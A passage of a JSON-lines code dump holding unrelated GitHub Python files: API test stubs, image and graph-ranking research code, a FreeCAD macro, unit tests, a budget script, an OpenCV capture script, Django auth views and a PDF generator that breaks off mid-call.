utf-8\n\n\"\"\"\n Moira Alert\n\n This is an API description for Moira Alert project. Please check https://github.com/moira-alert # noqa: E501\n\n The version of the OpenAPI document: 2.5.1.47\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\nimport datetime\n\nimport openapi_client\nfrom openapi_client.models.event import Event # noqa: E501\nfrom openapi_client.rest import ApiException\n\nclass TestEvent(unittest.TestCase):\n \"\"\"Event unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def make_instance(self, include_optional):\n \"\"\"Test Event\n include_option is a boolean, when False only required\n params are included, when True both required and\n optional params are included \"\"\"\n # model = openapi_client.models.event.Event() # noqa: E501\n if include_optional :\n return Event(\n trigger_event = True, \n timestamp = 1590741878, \n metric = 'carbon.agents.*.metricsReceived', \n value = 70, \n state = 'OK', \n trigger_id = '5ff37996-8927-4cab-8987-970e80d8e0a8', \n sub_id = '0', \n contact_id = '0', \n old_state = 'ERROR', \n msg = '0', \n event_message = openapi_client.models.event_event_message.Event_event_message(\n maintenance = openapi_client.models.event_event_message_maintenance.Event_event_message_maintenance(\n setup_user = '0', \n setup_time = 56, \n remove_user = '0', \n remove_time = 56, ), \n interval = 56, )\n )\n else :\n return Event(\n )\n\n def testEvent(self):\n \"\"\"Test Event\"\"\"\n inst_req_only = self.make_instance(include_optional=False)\n inst_req_and_optional = self.make_instance(include_optional=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"idoqo/moira-clients","sub_path":"python/test/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7091074846","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom skimage import feature, transform, io, draw\nfrom sklearn.cluster import DBSCAN\nimport os\n\ndef load_images(path, color):\n os.chdir(path)\n filenames = [f for f in os.listdir('.') if os.path.isfile(f)]\n images = []\n for file in filenames:\n images.append(io.imread(file, not color))\n return images\n\n# TODO: Add docstring\nclass PolarBodyDetector:\n \"\"\"\n A class that can detect the presence of a polar body\n \n Args:\n \n Returns:\n \n \"\"\"\n def __init__(self, pipTemplate, startImg, cSigma=2, cLow=0.1, cHigh=0.6, minR=60,\n eSigma=2, eThres=0.1, dbEps=20, dbSamples=150):\n self.pipTemplate = pipTemplate # Template of the pipette tip\n self.startImg = startImg # First image before detection\n self.cSigma = cSigma # sigma of gaussian filter for canny edge detection\n self.cLow = cLow # low threshold for canny\n self.cHigh = cHigh # high threshold for canny\n self.minR = minR # minimum radius of oolemma\n self.eSigma = eSigma # sigma of gaussian filter for edge detection\n self.eThres = eThres # threshold for edge detection\n self.dbEps = dbEps # distance of samples for clustering\n self.dbSamples = dbSamples # minimum number of samples in a cluster\n self._detect_oocyte_roi(startImg)\n self._detect_oolemma_roi(startImg)\n \n def _detect_oocyte_roi(self, img):\n res = feature.match_template(img, self.pipTemplate)\n ij = np.unravel_index(np.argmax(res), res.shape)\n self.coordROI = (ij[0]-45, ij[1]-200, 250, 200)\n roi = img[ij[0]-45:ij[0]+205,ij[1]-200:ij[1]]\n return roi\n \n def _detect_oolemma_roi(self, img):\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n # find canny edges to detect oolemma\n roiC = feature.canny(roi, sigma=self.cSigma,\n low_threshold=roi.mean()*self.cLow, \n high_threshold=roi.mean()*self.cHigh)\n \n # Create a bounding box and find center of box\n lr = roiC.mean(axis=0)\n ud = roiC.mean(axis=1)\n l, r = np.nonzero(lr)[0][0], np.nonzero(lr)[0][-1]\n u, d = np.nonzero(ud)[0][0], np.nonzero(ud)[0][-1]\n cy, cx = int((u+d)/2.0), int((r+l)/2.0)\n \n dist = np.asarray([(r-l)/2.0, (d-u)/2.0])\n \n self.minDist = dist.min()\n self.maxDist = dist.max()\n aveDist = (self.maxDist+self.minDist)/2\n self.coordOO = (cy, cx, aveDist)\n \n def _create_patch(self, img):\n cy, cx, aveDist = self.coordOO\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n \n minDist = int(aveDist-10)\n maxDist = int(aveDist+30)\n \n # Extract a patch by \n imPad = np.zeros((400,400), dtype=np.float64)\n imPad[200-cy:450-cy, 200-cx:400-cx] = roi\n imRot = transform.rotate(imPad, angle=30, center=[200,200])\n patch = np.expand_dims(imRot[200-maxDist:200-minDist, 200],axis=1)\n for i in range(29,-210,-1):\n imRot = transform.rotate(imPad, angle=i, center=[200,200])\n vert = np.expand_dims(imRot[200-maxDist:200-minDist, 200],axis=1)\n patch = np.hstack([patch, vert])\n return patch, (cy,cx)\n \n \n def _detect_polar_body_patch(self, patch):\n # Find edges in patch\n patchKT = feature.corner_shi_tomasi(patch, sigma=self.eSigma)\n patchKT = (patchKT-patchKT.min())/(patchKT.max()-patchKT.min())\n patchTH = patchKT.copy()\n # threshold edges\n th = self.eThres\n patchTH[patchKT<=th] = 0\n patchTH[patchKT>th] = 255\n patchTH[:,0:6] = 0\n patchTH[:,235:] = 0\n \n # extract coordinates of keypoints\n keyps = np.where(patchTH==255)\n keyps = np.asarray([[y, x] for (y,x) in zip(keyps[0], keyps[1])])\n \n # if any keypoints are found, find clusters\n if keyps.size > 0:\n \n db = DBSCAN(eps=self.dbEps, min_samples=self.dbSamples).fit(keyps)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n \n if np.asarray((labels==-1)).all():\n pb = False\n coord = (-1,-1)\n elif np.asarray((labels==0)).any():\n # find the geometric center of the cluster\n class_member_mask = (labels==0)\n xy = keyps[class_member_mask]\n ym = int((xy[:,0].max()+xy[:,0].min())/2)\n xm = int((xy[:,1].max()+xy[:,1].min())/2)\n pb = True\n coord = (ym,xm)\n return pb, coord\n \n def detect_and_extract_patch(self, img):\n patch, center = self._create_patch(img)\n pb, pbPos = self._detect_polar_body_patch(patch)\n return pb, pbPos, patch\n \n def detect_and_extract(self,img, visualize=False):\n cy, cx, aveDist = self.coordOO\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n\n alpha = np.linspace(0,18,num=10)*5/180*np.pi\n circy = (np.cos(alpha)*(aveDist+5)).astype(np.uint8)\n circx = (np.sin(alpha)*(aveDist+5)).astype(np.uint8)\n \n coord = np.vstack([ np.hstack([cy-np.flipud(circy[0:5]), cy-circy[1:],\n cy-np.flipud(circy[0:-1]*(-1)), cy-circy[1:5]*(-1)]),\n np.hstack([np.flipud(circx[0:5])+cx, circx[1:]*(-1)+cx,\n np.flipud(circx[0:-1]*(-1))+cx, circx[1:5]+cx])])\n coord[coord<20] = 20\n pbpos = np.zeros([2,1], dtype=np.uint64)\n mask = np.zeros((40,40), dtype=bool)\n mask[0:6,0:6] = True\n mask[-5:,0:6] = True\n mask[0:6,-5:] = True\n mask[-5:, -5:] = True\n \n if visualize:\n roiTemp = roi.copy()\n for y,x in zip(coord[0,:], coord[1,:]):\n for i in range(-1,2):\n roiTemp[draw.polygon_perimeter([y-20+i, y-20+i, y+20-i, y+20-i, y-20-i],\n [x-20+i, x+20-i, x+20-i, x-20+i, x-20+i],\n shape=roiTemp.shape)] = 1\n \n for i in range(0,coord.shape[1]):\n patch = roi[coord[0,i]-20:coord[0,i]+20, coord[1,i]-20:coord[1,i]+20].copy()\n patchKT = feature.corner_shi_tomasi(patch, sigma=2)\n patchKT = (patchKT-patchKT.min())/(patchKT.max()-patchKT.min())\n patchTH = patchKT.copy()\n th = 0.1\n patchTH[patchKT<=th] = 0\n patchTH[patchKT>th] = 1\n patchTH[mask] = 0\n \n keyps = np.where(patchTH==1)\n keyps = np.asarray([[y, x] for (y,x) in zip(keyps[0], keyps[1])])\n \n if keyps.size > 0:\n \n db = DBSCAN(eps=self.dbEps, min_samples=self.dbSamples).fit(keyps)\n labels = db.labels_\n if np.asarray((labels==0)).any():\n class_member_mask = (labels==0)\n xy = keyps[class_member_mask]\n pbpos = np.hstack([pbpos,(np.vstack([coord[0,i]+xy[:,0]-20,coord[1,i]+xy[:,1]-20]))])\n \n pbpos = np.transpose(pbpos).astype(np.uint64)\n pbCoord = pd.DataFrame(data=pbpos, columns={'y','x'})\n pbCoord.drop_duplicates(['x','y'], inplace=True)\n \n db = DBSCAN(eps=25, min_samples=700).fit(pbCoord.values)\n labels = db.labels_\n \n if np.asarray((labels==-1)).all():\n pb = False\n pbPos = (-1,-1)\n if visualize:\n roiPB = roi.copy()\n elif np.asarray((labels==0)).any():\n # find the geometric center of the cluster\n pb = True\n class_member_mask = (labels==0)\n xy = pbCoord.values[class_member_mask]\n pby = int((xy[:,0].max()+xy[:,0].min())/2)\n pbx = int((xy[:,1].max()+xy[:,1].min())/2)\n pbPos = (pby, pbx)\n if visualize:\n roiPB = roi.copy()\n roiPB[xy[:,0], xy[:,1]] = 1\n\n inPosition = False\n \n if visualize:\n return pb, pbPos, inPosition, roiTemp, roiPB, pbCoord\n else:\n return pb, pbPos, inPosition","repo_name":"DanielHMeyer/IVF_PolarBodyDetection","sub_path":"polarbodydetection.py","file_name":"polarbodydetection.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5862783255","text":"\"\"\"\n@author: JUMP\n@date 2021/12/13\n@description: 加载模型进行预测,使用排序算法对节点进行排序并保存排序结果\n\"\"\"\nimport json\n\nimport tensorflow as tf\nfrom experiment.exp_utils import *\nfrom gcn.models import GCN\nimport networkx as nx\nfrom experiment.pagerank import PageRank\nfrom experiment.leaderrank import LeaderRank\nfrom experiment.hits import HITS\nfrom experiment.myrank import MyRank\nfrom experiment.User import User\nfrom experiment.weightedpagerank import WeightedPagerank\nimport time\n\n\nclass NpEncoder(json.JSONEncoder):\n \"\"\"\n 用户将ndarry保存至json时的数据类��转换\n \"\"\"\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NpEncoder, self).default(obj)\n\n\nif __name__ == \"__main__\":\n\n dataset = \"cora\"\n type_num = 7\n\n # dataset = \"citeseer\"\n # type_num = 6\n\n # dataset = \"pubmed\"\n # type_num = 3\n\n\n\n flags = tf.app.flags\n # 'cora', 'citeseer', 'pubmed'\n flags.DEFINE_string('dataset', dataset, 'Dataset string.')\n # 'gcn', 'gcn_cheby', 'dense'\n flags.DEFINE_string('model', 'gcn', 'Model string.')\n flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\n flags.DEFINE_integer('epochs', 200, 'Number of epochs to train.')\n flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.')\n flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')\n flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')\n flags.DEFINE_integer('early_stopping', 10, 'Tolerance for early stopping (# of epochs).')\n flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.')\n\n adj, features, y_test, test_mask = load_data(dataset)\n\n # 未处理过的原始特征矩阵,已转换为ndarray\n raw_features = features.A\n # 未处理过的原始邻接矩阵,已转换为DiGraph\n raw_adj = nx.DiGraph(adj)\n\n\n # Some preprocessing\n features = preprocess_features(features)\n support = [preprocess_adj(adj)]\n\n # Define placeholders\n placeholders = {\n 'support': [tf.sparse_placeholder(tf.float32) for _ in range(1)],\n 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),\n 'labels': tf.placeholder(tf.float32, shape=(None, y_test.shape[1])),\n 'labels_mask': tf.placeholder(tf.int32),\n 'dropout': tf.placeholder_with_default(0., shape=()),\n 'num_features_nonzero': tf.placeholder(tf.int32) # helper variable for sparse dropout\n }\n\n # Create model\n model = GCN(placeholders, input_dim=features[2][1], logging=True, name=dataset)\n\n # Initialize session\n sess = tf.Session()\n # Init variables\n sess.run(tf.global_variables_initializer())\n\n # 加载模型\n print(\"Loading model start...\")\n saverdir = \"../model/\" + dataset\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint(saverdir))\n print(\"Loading model finish...\")\n\n # 节点类型预测\n print(\"Model predict start...\")\n feed_dict_validate = construct_feed_dict(features, support, y_test, test_mask, placeholders)\n predictions = sess.run(model.predict(), feed_dict=feed_dict_validate)\n print(\"Model predict finish...\")\n\n # 将预测结果转换成标签0 ~ n\n predict_labels = transfer_res_to_label(predictions)\n # 获取各类的代表向量\n repre_vectors = get_representation_vector(raw_features, predict_labels,type_num)\n # 获取代表向量间的相似度矩阵\n cos_sim_mat = get_cos_sim_matrix(repre_vectors, type_num)\n\n\n\n \"\"\"\n PageRank算法\n cora:209轮达到稳态\n citeseer:220轮左右\n pubmed:204轮\n \"\"\"\n\n # total = 0\n # for _ in range(5):\n # pr_start = time.time()\n # pageRank = PageRank(adj.shape[0])\n # for i in range(20):\n # pageRank.rank(raw_adj, 10)\n # pr_list = pageRank.get_rank(predict_labels)\n # pr_end = time.time()\n # total += pr_end - pr_start\n # print(\"pagerank avg time:\", total / 5)\n\n\n # pr_record = pageRank.get_epoch_record()\n # pr_path = \"./\" + dataset + \"_rank/pr_rank.json\"\n # with open(pr_path, \"w\") as f:\n # json.dump(pr_list, f, cls=NpEncoder)\n # pr_end = time.time()\n # print(\"pagerank total time:\", pr_end - pr_start)\n\n\n #\n\n \"\"\"\n 本算法\n single:\n cora: 218轮\n last_week = [4]\n \n citeseer:206轮\n last_week = [4]\n \n pubmed:217轮\n last_week = [0]\n \n \n multi:\n cora: 4、5、6 三类 235轮\n last_week = [4, 5, 6]\n last_month = [6,6,6,5,5]\n last_three_months = [4,4]\n \n \n citeseer:3、4、5 三类 230轮\n last_week = [3, 4, 5]\n last_month = [5,5,5,4,4]\n last_three_months = [3,3]\n \n pubmed:0、1 两类 233轮\n last_week = [0,1,0]\n last_month = []\n last_three_months = []\n \n \n personalized recommendation:\n cora: 234轮 personal_1.json\n last_week = [4, 6]\n last_month = [6,6,6,4,4]\n last_three_months = [6,6]\n \n 233轮 personal_2.json\n last_week = [4, 4]\n last_month = [4, 4, 4, 4, 6]\n last_three_months = [4, 4]\n \n \"\"\"\n last_week = [0]\n last_month = []\n last_three_months = []\n\n # myrank_total_time = 0\n # for _ in range(5):\n # myrank_start = time.time()\n # user = User(last_week, last_month, last_three_months)\n # myrank = MyRank(user, raw_adj, cos_sim_mat, predict_labels, type_num, adj.shape[0])\n # for i in range(20):\n # myrank.rank(raw_adj, 10, predict_labels)\n # myrank_list = myrank.get_rank(predict_labels)\n # myrank_end = time.time()\n # myrank_total_time += (myrank_end - myrank_start)\n # print(\"MyRank average runtime:\", myrank_total_time / 5)\n\n # myrank_record = myrank.get_epoch_record()\n # myrank_path = \"./\" + dataset + \"_rank/personal_2.json\"\n # with open(myrank_path, \"w\") as f:\n # json.dump(myrank_list, f, cls=NpEncoder)\n\n\n\n\n \"\"\"\n HITS算法\n cora:100轮\n citeseer:100轮\n pubmed:100轮\n \"\"\"\n\n # total = 0\n # for _ in range(2):\n # hits_start = time.time()\n # hits = HITS(raw_adj, adj.shape[0])\n # for i in range(20):\n # hits.rank(raw_adj, 10)\n # hist_list = hits.get_rank(predict_labels)\n # hits_end = time.time()\n # total += hits_end - hits_start\n # print(\"hits runtime:\", total / 2)\n\n # hits_record = hits.get_epoch_record()\n # hits_path = \"./\" + dataset + \"_rank/hits_rank.json\"\n # with open(hits_path, \"w\") as f:\n # json.dump(hist_list, f, cls=NpEncoder)\n\n\n \"\"\"\n LeaderRank算法\n cora:167轮\n citeseer:180轮\n pubmed:268轮\n \"\"\"\n\n # total = 0\n # for _ in range(5):\n # lr_start = time.time()\n # leader_rank = LeaderRank()\n # leader_rank.rank(raw_adj, 200)\n # lr_list = leader_rank.get_rank(predict_labels)\n # lr_end = time.time()\n # total += lr_end - lr_start\n # print(\"lr runtime:\", total / 5)\n\n # lr_record = leader_rank.get_epoch_record()\n # lr_path = \"./\" + dataset + \"_rank/lr_rank.json\"\n # with open(lr_path, \"w\") as f:\n # json.dump(lr_list, f, cls=NpEncoder)\n\n\n \"\"\"\n Weighted PageRank\n cora:100轮\n citeseer:100轮\n pubmed:50轮\n \"\"\"\n total = 0\n for _ in range(5):\n wpr_start = time.time()\n wpr = WeightedPagerank(raw_adj, adj.shape[0])\n for i in range(10):\n wpr.rank(raw_adj, 10)\n wpr_list = wpr.get_rank(predict_labels)\n wpr_end = time.time()\n total += wpr_end - wpr_start\n print(\"wpr runtime:\", total / 5)\n\n\n # wpr_records = wpr.get_epoch_record()\n # wpr_path = \"./\" + dataset + \"_rank/wpr_rank.json\"\n # with open(wpr_path, \"w\") as f:\n # json.dump(wpr_list, f, cls=NpEncoder)\n\n i = 1\n\n\n","repo_name":"MMNMNMN/HisRank","sub_path":"experiment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70430276267","text":"import FreeCADGui as Gui, FreeCAD, Part, math\n\nprintfc = FreeCAD.Console.PrintMessage\n\nfaces = []\n\nfor sel in Gui.Selection.getSelectionEx():\n if len(sel.Object.Shape.Faces):\n faces.extend(sel.Object.Shape.Faces)\n else:\n faces.extend(sel.SubObjects)\n \n\nshell=Part.makeShell(faces)\nsolid=Part.makeSolid(shell)\nPart.show(solid)\n\n\n","repo_name":"andrewjrobinson/FreeCAD-Macro-Suite","sub_path":"src/nonparametric/MakeSolid.py","file_name":"MakeSolid.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26811096477","text":"\"\"\"\nTest for OWL 2 RL/RDF rules from\n\n Table 4. The Semantics of Equality\n\nhttps://www.w3.org/TR/owl2-profiles/#Reasoning_in_OWL_2_RL_and_RDF_Graphs_using_Rules\n\"\"\"\n\nfrom rdflib import Graph, BNode, Literal, Namespace, RDF, XSD, RDFS, OWL\n\nimport owlrl\n\nDAML = Namespace('http://www.daml.org/2002/03/agents/agent-ont#')\nT = Namespace('http://test.org/')\n\ndef test_eq_diff1():\n \"\"\"\n Test eq-diff1 rule for OWL 2 RL.\n\n If::\n\n T(?x, owl:sameAs, ?y)\n T(?x, owl:differentFrom, ?y)\n\n then::\n\n false\n \"\"\"\n g = Graph()\n\n x = T.x\n y = T.y\n\n g.add((x, OWL.sameAs, y))\n g.add((x, OWL.differentFrom, y))\n\n owlrl.DeductiveClosure(owlrl.OWLRL_Semantics).expand(g)\n\n result = g.objects(predicate=DAML.error)\n expected = Literal(\n '\\'sameAs\\' and \\'differentFrom\\' cannot be used on the same' \\\n + ' subject-object pair:'\n )\n \n # expect multiple error messages for pairs (x, y), (x, x) and (y, y)\n # due to contradiction:\n #\n # x == y and x != y => x != x and y != y and x == x and y == y\n assert all(r.startswith(expected) for r in result)\n\n","repo_name":"BastyZ/RDFPlayground","sub_path":"mimir/src/main/reasoner/owlrl/test/test_equality.py","file_name":"test_equality.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"28231120482","text":"import os\nimport csv\nprint(\"Financial Analysis\")\nprint(\"-----------------------------\")\nbudget_data_path = os.path.join('Resources', 'budget_data.csv')\n\nwith open(budget_data_path, \"r\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter = \",\")\n header = next(csvreader)\n data = list(csvreader)\n date, profit_loss = zip(*data)\n #print('date =', date)\n #print('profit and loss =', profit_loss)\n xtol = [int(x) for x in profit_loss if x]\n #print(xval)\n total_date = len(date)\n print(\"Total Month: \" + str(total_date))\n total_profit_loss = sum(xtol)\n print(\"Total Profit and Loss: \" + str(total_profit_loss))\n revenue_change = []\n for i in range(1, len(xtol)):\n revenue_change.append((int(xtol[i]) - int(xtol[i-1])))\n # calculate average revenue change\n revenue_average = sum(revenue_change) / len(revenue_change)\n print(\"Average change is: \" + str(revenue_average))\n maxtotal = max(xtol)\n print(\"The greatest increase is: \" + str(date[revenue_change.index(max(revenue_change))+1]) + \" \" + str(maxtotal))\n mintotal = min(xtol)\n print(\"The greatest decrease is: \" + str(date[revenue_change.index(min(revenue_change))+1]) + \" \" + str(mintotal))\n\n \n file = open(\"output.txt\",\"w\")\n file.write(\"Financial Analysis\" + \"\\n\")\n file.write(\"....................................................................................\" + \"\\n\")\n file.write(\"Total Month: \" + str(total_date) + \"\\n\")\n file.write(\"Total Profit and Loss: \" + str(total_profit_loss) + \"\\n\")\n file.write(\"Average change is: \" + str(revenue_average) + \"\\n\")\n file.write(\"The greatest increase is: \" + str(date[revenue_change.index(max(revenue_change))+1]) + \" \" + str(maxtotal) + \"\\n\")\n file.write(\"The greatest decrease is: \" + str(date[revenue_change.index(min(revenue_change))+1]) + \" \" + str(mintotal) + \"\\n\")\n file.close()\n \n ","repo_name":"sdee10/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10054685579","text":"\"\"\"\n@Author:WangYuXiang\n@E-mile:Hill@3io.cc\n@CreateTime:2021/1/28 16:16\n@DependencyLibrary:无\n@MainFunction:无\n@FileDoc: \n test_char_field.py\n 字符字段单元测试\n@ChangeHistory:\n datetime action why\n example:\n 2021/1/28 16:16 change 'Fix bug'\n \n\"\"\"\nimport asyncio\nimport unittest\n\nfrom tortoise.contrib.test import initializer\n\nfrom sanic_rest_framework.exceptions import ValidationError\nfrom sanic_rest_framework.fields import CharField\nfrom sanic_rest_framework.test.test_fields.test_base_field import TestBaseField\n\ninitializer(['sanic_rest_framework.test.models', ],\n # db_url=\"sqlite://./db.sqlite\",\n loop=asyncio.get_event_loop())\n\n\nclass TestCharField(TestBaseField):\n def test_external_to_internal(self):\n data = ' Python'\n char1 = CharField()\n self.assertEqual(char1.external_to_internal(data), 'Python')\n\n async def test_internal_to_external(self):\n data1 = {'char1': 'Python'}\n data2 = {'char1': 66666}\n char1 = CharField()\n char1.bind('char1', char1)\n\n value = await char1.get_internal_value(data1)\n self.assertEqual(await char1.internal_to_external(value), 'Python')\n\n value = await char1.get_internal_value(data2)\n self.assertEqual(await char1.internal_to_external(value), '66666')\n\n def test_trim_whitespace(self):\n data = ' Python'\n char1 = CharField()\n char2 = CharField(trim_whitespace=True)\n char3 = CharField(trim_whitespace=False)\n c1_data = char1.external_to_internal(data)\n c2_data = char2.external_to_internal(data)\n c3_data = char3.external_to_internal(data)\n self.assertEqual(c1_data, 'Python')\n self.assertEqual(c2_data, 'Python')\n self.assertEqual(c3_data, ' Python')\n\n def test_max_length(self):\n data = 'Python'\n char1 = CharField()\n char2 = CharField(max_length=10)\n char3 = CharField(max_length=5)\n self.assertEqual(char1.run_validation(data), 'Python')\n self.assertEqual(char2.run_validation(data), 'Python')\n\n with self.assertRaises(ValidationError):\n char3.run_validation(data)\n\n def test_min_length(self):\n data = 'Python'\n char1 = CharField()\n char2 = CharField(min_length=5)\n char3 = CharField(min_length=10)\n self.assertEqual(char1.run_validation(data), 'Python')\n self.assertEqual(char2.run_validation(data), 'Python')\n\n with self.assertRaises(ValidationError):\n char3.run_validation(data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"OpenHill/sanic_rest_framework","sub_path":"test/test_fields/test_char_field.py","file_name":"test_char_field.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10327360046","text":"import cv2\n\ndef capture_image_sequence(): \n cv2.namedWindow(\"camera\")\n camera = cv2.VideoCapture(0)\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))\n \n recording = False\n counter = 0\n while camera.isOpened():\n ret,img= camera.read() \n \n if recording:\n out.write(img)\n cv2.putText(img,'recording', (10,60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n \n cv2.putText(img,str(counter), (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.imshow(\"camera\", img) \n \n counter += 1\n \n k = cv2.waitKey(1)\n if k%256 == 32:\n if not recording:\n counter = 0\n print(\"Space hit, recording...\")\n recording = True\n else:\n print(\"Space hit, stop recording and closing...\")\n break\n elif k%256 == 27:\n print(\"Escape hit, closing...\")\n break \n \n out.release()\n camera.release()\n cv2.destroyWindow(\"camera\") \n\ndef extract_frames(numbers):\n video = cv2.VideoCapture(\"output.avi\")\n counter = 0\n while video.isOpened():\n ret,img= video.read()\n if not ret:\n break\n if counter in numbers:\n cv2.imwrite(\"frame_%s.jpg\"%counter, img)\n counter+=1\n video.release()\n cv2.destroyWindow(\"video\")\n \ndef load_and_display(number):\n img = cv2.imread(\"frame_%s.jpg\"%number)\n cv2.imshow(\"image\", img)\n cv2.waitKey(0)\n cv2.destroyWindow(\"image\")\n \n\ndef main():\n capture_image_sequence()\n \n extract_frames([25,50,100])\n \n load_and_display(50)\n \nmain()","repo_name":"sriranjani-s/Artificial-Intelligence-Learnings-and-Projects","sub_path":"Machine Vision/Labs/Lab_MV_01.py","file_name":"Lab_MV_01.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17865813359","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth import login\nfrom django.contrib.auth.views import LoginView\nfrom django.contrib.auth.views import LogoutView\nfrom django.http import HttpRequest\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView\n\nfrom .forms import RegForm\nfrom .forms import UserLoginForm\nfrom .models import Profile\n\n\nclass LoginAuthView(LoginView):\n template_name = 'page_login/index.html'\n authentication_form = UserLoginForm\n \n main_header = 'Авторизация'\n page_header = f'{main_header} | Django | Skillbox'\n page_title = f'{main_header}'\n \n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n # return self.render_to_response(context=context)\n return context\n\n\nclass LogoutAuthView(LogoutView):\n # next_page = '/auth/login'\n template_name = 'auth_template/logout.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n \n logout_page_data = self.request.META['HTTP_REFERER']\n host_data: str = self.request.META['HTTP_HOST']\n # print(host_data)\n # print(logout_page_data)\n \n logout_page_arr: list = logout_page_data.split(host_data + '/')\n # print(f'{logout_page_arr=}')\n \n if len(logout_page_arr) >= 2:\n logout_page = logout_page_arr[1]\n else:\n logout_page = '/'\n # print(f'{logout_page=}')\n context['logout_page'] = logout_page\n # print(self.request.META)\n \n return context\n\n\nclass RegView(TemplateView):\n template_name = 'page_reg/index.html'\n \n main_header = 'Регистрация'\n page_header = f'{main_header} | Django | Skillbox'\n page_title = f'{main_header}'\n \n def get_context_data(self, **kwargs):\n \"\"\"\n GET\n :param kwargs:\n :return:\n \"\"\"\n \n context = super().get_context_data(**kwargs)\n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n user_reg_form = RegForm()\n \n context['form'] = user_reg_form\n \n return context\n \n def post(self, request: HttpRequest, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n \n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n form = RegForm(request.POST)\n \n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n birthday = form.cleaned_data.get('birthday')\n city = form.cleaned_data.get('city')\n \n Profile.objects.create(\n user=user,\n city=city,\n birthday=birthday\n )\n \n user = authenticate(username=username, password=password)\n login(request, user)\n return redirect('/')\n \n context['form'] = form\n \n return self.render_to_response(context=context)\n","repo_name":"VolodinAS/skillbox-python-django-practice","sub_path":"01_IntroductionToWebFrameworks/todo/app_users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33575279015","text":"import pdfkit\nfrom movies import Movies\n\n\nPDF_DIRECTORY = \"/var/tmp/\"\n\n\ndef safe_title(title):\n return title.replace(' ', '-')\n\n\ndef create_pdf_for_download(id):\n movie_data = Movies.selected_movie(id)\n movie_data = movie_data[0]\n\n language = movie_data['language']\n release_date = movie_data['release_date']\n title = movie_data['title']\n overview = movie_data['overview']\n original_language = movie_data['original_language']\n status = movie_data['status']\n runtime = movie_data['runtime']\n vote_average = movie_data['vote_average']\n genres = movie_data['genres']\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n production_country_data = Movies.if_production_country(id)\n production_country_data = production_country_data[0]\n\n countries = production_country_data['countries']\n\n if countries == None:\n countries = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n spoken_language_data = Movies.if_spoken_languages(id)\n spoken_language_data = spoken_language_data[0]\n\n spoken_languages = spoken_language_data['languages']\n\n if spoken_languages == None:\n spoken_languages = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n production_company_data = Movies.if_production_company(id)\n production_company_data = production_company_data[0]\n\n company = production_company_data['company']\n\n if company == None:\n company = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n file = open('template.html', 'r')\n html_file = file.read()\n\n html_file = html_file.format(language=language, release_date=release_date,\n title=title, overview=overview, original_language=original_language,\n status=status, runtime=runtime, vote_average=vote_average, spoken_languages=spoken_languages, countries=countries,\n 